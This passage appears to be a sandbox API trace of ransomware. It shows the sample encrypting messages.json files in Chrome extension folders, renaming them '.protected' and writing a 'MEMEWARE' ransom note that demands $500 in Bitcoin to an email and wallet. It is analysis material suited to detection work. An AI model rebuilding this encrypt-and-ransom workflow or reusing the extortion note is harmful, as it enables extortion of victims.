pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\*") returned 152 [0083.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.976] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.976] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.976] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.976] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.976] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.976] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\.") returned 152 [0083.976] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.976] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.976] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.976] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.976] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.976] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.976] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.976] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\..") returned 153 [0083.976] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.976] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.976] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.976] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.976] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0083.976] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.976] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.976] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.976] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0083.977] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0083.977] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json") returned 164 [0083.977] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.977] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.979] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.979] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.979] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.979] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.979] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.979] CloseHandle (hObject=0x168) returned 1 [0083.979] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.protected") returned 174 [0083.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.protected")) returned 1 [0083.980] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.980] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.980] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\RESTORE_FILES.txt") returned 
168 [0083.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.980] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.980] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.981] lstrlenA (lpString="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") returned 684 [0083.981] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.981] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.981] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.982] CloseHandle (hObject=0x164) returned 1 [0083.982] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="Windows") returned -1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="Program Files") returned 1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="Program Files (x86)") returned 1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="$Recycle.bin") returned 1 [0083.982] lstrcmpiW (lpString1="ta", lpString2="System Volume Information") returned 1 [0083.982] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta") returned 150 [0083.982] lstrcmpW (lpString1="ta", lpString2=".") returned 1 [0083.982] lstrcmpW (lpString1="ta", lpString2="..") returned 1 [0083.982] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\*") returned 152 [0083.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.982] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.982] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.982] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.982] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.982] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.982] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\.") returned 152 [0083.982] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.982] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.982] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.982] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.983] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.983] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.983] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.983] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\..") returned 153 [0083.983] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.983] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.983] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.983] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.983] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") returned 164 [0083.983] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.983] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.983] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.983] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") returned 164 [0083.984] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") returned 164 [0083.984] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json") 
returned 164 [0083.984] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.984] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.986] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.986] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.986] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.986] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.986] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.986] CloseHandle (hObject=0x168) returned 1 [0083.986] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.protected") returned 174 [0083.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.protected")) returned 1 [0083.987] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.987] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.987] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\RESTORE_FILES.txt") returned 168 [0083.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.987] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.987] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.988] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.988] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.988] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.988] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.988] CloseHandle (hObject=0x164) returned 1 [0083.988] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.988] lstrcmpiW (lpString1="te", lpString2="Windows") returned -1 [0083.988] lstrcmpiW (lpString1="te", lpString2="Program Files") returned 1 [0083.988] lstrcmpiW (lpString1="te", lpString2="Program Files (x86)") returned 1 [0083.988] lstrcmpiW (lpString1="te", lpString2="$Recycle.bin") returned 1 [0083.988] lstrcmpiW (lpString1="te", lpString2="System Volume Information") returned 1 [0083.988] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te") returned 150 [0083.988] lstrcmpW (lpString1="te", lpString2=".") returned 1 [0083.988] lstrcmpW (lpString1="te", lpString2="..") returned 1 [0083.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\*") returned 152 [0083.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.989] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.989] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.989] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.989] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.989] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 